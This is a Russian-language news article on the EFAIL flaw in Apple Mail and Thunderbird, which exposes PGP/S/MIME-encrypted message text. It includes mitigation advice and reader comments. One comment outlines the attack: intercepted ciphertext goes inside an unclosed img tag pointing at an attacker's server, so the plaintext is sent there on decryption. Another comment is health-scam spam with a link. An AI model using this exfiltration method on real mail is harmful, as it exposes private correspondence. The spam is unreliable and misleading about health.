Проблема в безопасности Apple Mail позволяет читать зашифрованный текст

8

Исследователи в области безопасности обнаружили проблемы с обработкой HTML во встроенном приложении Mail на iOS и macOS. Такую же проблему нашли в клиенте Mozilla Thunderbird. Эта уязвимость позволяет хакерам увидеть текст сообщения в зашифрованном письме. Зашифрованными письмами обычно пользуются те, кто хотят сохранить свою переписку конфиденциальной, и именно у них могут возникнуть с этим проблемы.

Электронная почта, как правило, не является безопасным способом общения по причине отсутствия шифрования. Тем не менее многие используют S/MIME и PGP для шифрования писем. Это делается в тех случаях, когда конфиденциальность переписки действительно стоит держать в сохранности. Однако информация, опубликованная недавно EFAIL, ставит под сомнение безопасность такого способа общения.

Проблема Apple Mail и Mozilla Thunderbird заключается в способе, которым эти почтовые клиенты обрабатывают проблемы с отображением HTML. Если злоумышленник получит зашифрованное письмо, он может отправить это письмо обратно отправителю, что даст ему доступ к зашифрованным данным без ключа шифрования. Для этого применяется хитрость, заставляющая клиент считать, что текст зашифрованного сообщения – это URL-изображения, которые нужно отобразить.

Для того чтобы закрыть эту дыру в безопасности, необходимо будет обновить плагин GPG. Обновление будет доступно в ближайшее время. До этого момента следует понимать, что злоумышленник должен находиться в контакте с отправителем сообщения. Безопасность вашей переписки снижается, если она является групповой. Для того чтобы еще чуть больше повысить безопасность своей переписки, вы можете отключить загрузку удаленных изображений в настройках вашего почтового клиента.

Лучший комментарий

8 комментариев Оставить свой

  1. -3
    trodege

    Ребзя, там бета голдмастер прилетела!

    • 0
      avolochanova

      trodege, Народ нас убивают, выяснилось что 97% граждан заражены паразитами и токсинами, а они прямо или косвенно вызывают большинство наших болезней, даже такие как рак и ожирение, проблемы сердца и остальные. Но теперь есть спасение и можно за неделю очиститься. Очистка кардинально улучшила мое здоровье и самочувствие, советую всем попробовать. Вот почитайте чем грозит пренебрежение очищением — http://g.g/9qn0p

  2. 0
    美少女

    Ничего не понятно. Как увидеть текст письма? Отправить назад, и только отправитель увидит? Или в отправленных будет лежать расшифрованное письмо?

    • 0
      Azazello

      美少女, В общем, суть такая — нужно перехватить зашифрованное письмо. Дальше — создаем html сообщение, в нем вводим — <img src="нашсервер.чтото/ и дальше перехваченный зашифрованный текст, потом закрывающий угольник. На сервере, конечно, загружаем скрипт, который записывает что там нам пришло.
      Отправитель получает свое письмо, открывает в Mail.app. Как правило — письмо зашифровано для двух человек — получателя и отправителя. Маил.апп сначала расшифровывает письмо, потом пытается загрузить картинку — по сути отправляет зашифрованный текст как параметр. Злоумышленник смотрит логи на сервере и видит расшифрованный текст.

      То есть:
      1. Нам нужно перехватить зашифрованное письмо
      2. Отправитель письма должен иметь включенную загрузку картинок.

    • 0
      steamson

      美少女, Тоже ничего не понял. Чтобы расшифровать письмо, надо иметь секретный ключ получателя. Бред какой-то. Мне кажется автор данной статьи не разобрался как работает уязвимость.

  3. 0
    diamont

    Клевая тема. Спасибо что рассказали 😉 меня тут часто учат на хакера 😉

  4. 0
    zloymac

    Вообще-то проблема не конкретно в эппл мейл, а вообще в системах шифрования электронной почты.

Авторизуйтесь Чтобы оставить комментарий

Новости партнеров